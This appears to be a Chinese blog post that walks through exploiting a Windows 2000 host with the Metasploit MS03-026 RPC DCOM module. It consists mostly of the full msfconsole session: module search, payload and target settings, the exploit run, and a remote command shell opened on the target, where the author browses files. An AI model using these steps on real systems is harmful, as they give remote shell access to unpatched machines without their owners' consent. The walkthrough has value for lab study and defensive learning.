利用msfconsole渗透攻击windows 2000

1.利用Nessus扫描该windows 2000的机器，发现有些高危的漏洞
比如：MS03-026 / MS03-039: Buffer Overrun In RPCSS Service Could Allow Code Execution (823980 / 824146)
然后打开msfconsole
msf > search ms03-026

Matching Modules
================

   Name                                  Disclosure Date  Rank   Check  Description
   ----                                  ---------------  ----   -----  -----------
   exploit/windows/dcerpc/ms03_026_dcom  2003-07-16       great  No     MS03-026 Microsoft RPC DCOM Interface Overflow


msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(windows/dcerpc/ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(windows/dcerpc/ms03_026_dcom) > show payloads
msf exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 10.26.33.111
RHOST => 10.26.33.111
msf exploit(windows/dcerpc/ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.26.33.111     yes       The target address
   RPORT  135              yes       The target port (TCP)


Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.26.33.111     no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(windows/dcerpc/ms03_026_dcom) > run

[*] 10.26.33.111:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 10.26.33.111:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.26.33.111[135] ...
[*] 10.26.33.111:135 - Sending exploit ...
[*] Started bind TCP handler against 10.26.33.111:4444
[*] Command shell session 1 opened (10.26.30.41:36675 -> 10.26.33.111:4444) at 2018-12-11 19:33:33 +0800



C:\WINNT\system32>d:    
d:

D:\>dir
dir
   ZRMPSEL_CN
  EAB5-D65E

 D:\ ¼

2003-06-26  20:00                   45 AUTORUN.INF
2003-06-26  20:00       <DIR>          BOOTDISK
2003-06-26  20:00              304,624 BOOTFONT.BIN
2003-06-26  20:00                    0 CDROMSP4.TST
2003-06-26  20:00                    5 CDROM_IP.5
2003-06-26  20:00                    5 CDROM_NT.5
2003-06-26  20:00       <DIR>          DISCOVER
2003-06-26  20:00       <DIR>          I386
2003-06-26  20:00               12,354 READ1ST.TXT
2003-06-26  20:00              465,408 README.DOC
2003-06-26  20:00              358,160 SETUP.EXE
2003-06-26  20:00       <DIR>          SETUPTXT
2003-06-26  20:00               18,173 SPNOTES.HTM
2003-06-26  20:00       <DIR>          SUPPORT
2003-06-26  20:00       <DIR>          VALUEADD
               9     1,158,774 

               6 ¼              0
利用msfconsole渗透攻击windows 2000

猜你喜欢
